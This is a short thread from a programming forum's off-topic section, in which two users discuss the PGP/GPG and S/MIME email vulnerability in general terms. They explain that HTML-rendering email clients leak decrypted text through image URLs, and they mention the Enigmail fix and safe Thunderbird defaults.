Critical vulnerabilities in PGP/GPG and S/MIME email encrypt

For everything that's not in any way related to PureBasic. General chat etc...
User avatar
Sicro
Enthusiast
Enthusiast
Posts: 538
Joined: Wed Jun 25, 2014 5:25 pm
Location: Germany
Contact:

Re: Critical vulnerabilities in PGP/GPG and S/MIME email enc

Post by Sicro »

This statement is wrong. The vulnerability exists with the email clients, which don't process the HTML emails correctly. The decrypted email text is interpreted by the email clients as part of a URL pointing to an image, and when fetching this URL, the server who is contacted for it, gets the URL with the decrypted email text. The encryption is therefore not cracked.

A new version of the add-on "Enigmail" for Thunderbird has already been released, which closes this vulnerability. A fix from the Thunderbird developers would have taken longer, so the Enigmail developers did the fix.

HTML emails are usually bad in view of security. People who had disabled the display of HTML emails in their email client were not affected by this vulnerability.
Image
Why OpenSource should have a license :: PB-CodeArchiv-Rebirth :: Pleasant-Dark (syntax color scheme) :: RegEx-Engine (compiles RegExes to NFA/DFA)
Manjaro Xfce x64 (Main system) :: Windows 10 Home (VirtualBox) :: Newest PureBasic version
User avatar
NicTheQuick
Addict
Addict
Posts: 1224
Joined: Sun Jun 22, 2003 7:43 pm
Location: Germany, Saarbrücken
Contact:

Re: Critical vulnerabilities in PGP/GPG and S/MIME email enc

Post by NicTheQuick »

In fact Thunderbird was not affected with unchanged settings because it never loads external resources without asking you first.
The english grammar is freeware, you can use it freely - But it's not Open Source, i.e. you can not change it or publish it in altered way.
Post Reply